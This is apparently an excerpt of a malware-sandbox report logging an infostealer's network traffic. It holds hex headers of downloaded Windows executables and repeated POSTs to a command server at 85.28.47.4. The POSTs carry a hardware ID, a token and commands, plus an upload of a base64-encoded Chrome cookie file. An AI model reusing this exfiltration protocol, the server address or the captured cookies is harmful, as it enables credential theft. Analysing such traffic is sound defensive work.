65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 19:47:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 28 Jun 2024 19:47:30 GMTContent-Type: application/octet-streamContent-Length: 1896960Last-Modified: Fri, 28 Jun 2024 18:11:28 GMTConnection: keep-aliveETag: "667efcd0-1cf200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 a0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 4b 00 00 04 00 00 8b eb 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 87 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 87 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 
ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 74 78 6c 65 77 65 7a 00 e0 19 00 00 b0 31 00 00 da 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 68 76 78 63 7a 74 76 00 10 00 00 00 90 4b 00 00 04 00 00 00 cc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 4b 00 00 22 00 00 00 d0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 28 Jun 2024 19:47:42 GMTContent-Type: application/octet-streamContent-Length: 2452992Last-Modified: Fri, 28 Jun 2024 16:09:55 GMTConnection: keep-aliveETag: "667ee053-256e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 fa 75 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 14 14 be 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 be 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 20 9d 00 73 0c 00 00 94 2c 9d 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 79 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 40 21 00 00 f0 9c 00 00 3a 21 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHCFCBKKJDGCAKFCFIHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 36 46 33 35 46 37 42 46 35 46 38 32 38 37 36 35 33 34 35 39 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="hwid"46F35F7BF5F82876534592------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="build"default------CAEHCFCBKKJDGCAKFCFI--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECBAKFBGDGCBGDBAECHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 2d 2d 0d 0a Data Ascii: ------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="message"browsers------BKECBAKFBGDGCBGDBAEC--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFIHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="message"plugins------AFHDAEGHDGDBGDGDAAFI--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIEBAAFBFBAKFIDBAFHHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 2d 2d 0d 0a Data Ascii: ------IIIEBAAFBFBAKFIDBAFHContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------IIIEBAAFBFBAKFIDBAFHContent-Disposition: form-data; name="message"fplugins------IIIEBAAFBFBAKFIDBAFH--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAAHost: 85.28.47.4Content-Length: 7971Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHCFCBKKJDGCAKFCFIHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 
5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzY1NDEJMVBfSkFSCTIwMjMtMTAtMDUtMDcKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk1NzQwCU5JRAk1MTE9bk5hZHFXOXVUY1kwT1A2STNhZm5yNzFvNkV6YVlMc
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFIJEBFCGDAAKFHIDBFHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 2d 2d 0d 0a Data Ascii: ------FCFIJEBFCGDAAKFHIDBFContent-Disposition: form-data; name="token"369448b26f0ae4e129442f4e96b087d52f87b5a413ea634f7932d1e39aeeb7022d5961e4------FCFIJEBFCGDAAKFHIDBFContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------FCFIJEBFCGDAAKFHIDBFContent-Disposition: form-data; name="file"------FCFIJEBFCGDAAKFHIDBF--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAAKEGDBFIJJKFHCFBHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 39 34 34 38 62 32 36 66 30 61 65 34 65 31 32 39 34 34 32 66 34 65 39 36 62 30 38 37 64 35 32 66 38 37 62 35 61 34 31 33 65 61 36 33 34 66 37 39 33 32 64 31 65 33 39 61 65 65 62 37 30 32 32 64 35 39 36 31 65 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 2d 2d 0d 